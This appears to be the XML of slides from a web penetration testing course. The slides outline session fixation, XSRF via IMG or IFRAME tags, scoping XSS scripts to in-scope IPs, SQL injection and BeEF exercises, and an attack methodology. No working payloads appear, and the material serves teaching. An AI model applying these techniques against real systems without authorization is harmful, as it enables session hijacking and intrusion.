              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 360"/>
              <a:gd name="T10" fmla="*/ 0 h 632"/>
              <a:gd name="T11" fmla="*/ 360 w 360"/>
              <a:gd name="T12" fmla="*/ 632 h 632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="360" h="632">
                <a:moveTo>
                  <a:pt x="360" y="584"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="292"/>
                  <a:pt x="48" y="0"/>
                  <a:pt x="24" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16"/>
                  <a:pt x="108" y="324"/>
                  <a:pt x="216" y="632"/>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8209" name="Text Box 67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6629400" y="4495800"/>
            <a:ext cx="2362200" cy="7381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2. Fetch page that refers to script on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0"/>
              <a:t>'s site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8210" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4492625" y="5715000"/>
            <a:ext cx="2057400" cy="9540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4. Run attack XSS … if server infrastructure allows access to it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8211" name="Freeform 69"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="4095750"/>
            <a:ext cx="3810000" cy="1739900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T2" fmla="*/ 0 w 2400"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2400"/>
              <a:gd name="T10" fmla="*/ 0 h 1096"/>
              <a:gd name="T11" fmla="*/ 2400 w 2400"/>
              <a:gd name="T12" fmla="*/ 1096 h 1096"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2400" h="1096">
                <a:moveTo>
                  <a:pt x="2400" y="856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1200" y="428"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="80"/>
                  <a:pt x="1200" y="588"/>
                  <a:pt x="2400" y="1096"/>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8212" name="Rectangle 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2895600" y="3200400"/>
            <a:ext cx="304800" cy="1447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1000" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8213" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="3200400" y="3276600"/>
            <a:ext cx="2362200" cy="11699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3. Server infrastructure determines if browser IP addr is in scope … if so, allows access to XSS attack script</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152579"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1981200"/>
            <a:ext cx="8458200" cy="4724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52582"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a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153603" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session state is a key point within web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session flaws can allow for various attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session hijacking from predictable session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session fixation which is covered next</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92183"/>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i="1" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>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54630"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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155651" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session fixation allows for us to control a user's session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The basic cause of the flaw is not changing the session ID after a user authenticates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We provide a link to a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The link includes the session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When the user clicks and authenticates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are able to use the session ID also</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70884"/>
            <a:ext cx="8458200" cy="45720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228600"/>
            <a:ext cx="3429000" cy="62484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105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Bypass Flaws</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Authentication Bypass</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t>Authentication Bypass Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Injection Flaws</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SQL Injection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File Handling with SQL Injection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OS Interaction with SQL Injection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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t>sqlmap Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
            </a:endParaRP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Port Scanning with SQL Injection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File Injection with SQL Injection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Prepared Injection Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Prepared Files Exercise</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Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection Exercise</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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Persistent XSS Exercise</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Advanced XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Durzosploit Exercise</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XSS Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">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BeEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> BeEF Exercise</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Limiting XSS targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Session Flaws</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Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" pitchFamily="-105" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t>XSRF</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MonkeyFist Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="-105" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-105" charset="-128"/>
              </a:rPr>
              <a:t> Putting It Together</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Attack Scenario</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Next Steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156678"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacking XSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploiting XSRF involves creating web pages that hold the attack link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IMG or IFRAME tags are commonly used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The attacker then needs to get the victim to view the page while they have an active session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>While creating this page sounds simple, typically we need to test multiple vulnerabilities</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167939"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89706" y="2091139"/>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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MonkeyFist Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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67942"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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1296229455"/>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167939"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50628"/>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p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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67942"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89706" y="1933553"/>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Authentication Bypass Exercise</a:t>
            </a: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21510"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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Putting it Together</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We have now worked through our complete process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A methodology of attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These four steps make up a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is cyclical and builds upon itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As new vulnerabilities are exploited the process starts over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The vulnerability found becomes a pivot point</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pivot Points</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pivot points are footholds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>They may gain us information or further access into the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Critical to follow up on these</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows us to understand the actual risk to the target</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172035"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57400"/>
            <a:ext cx="8458200" cy="44196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72038"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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attack Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use our process and knowledge to examine a complete system</a:t>
            </a:r>
          </a:p>
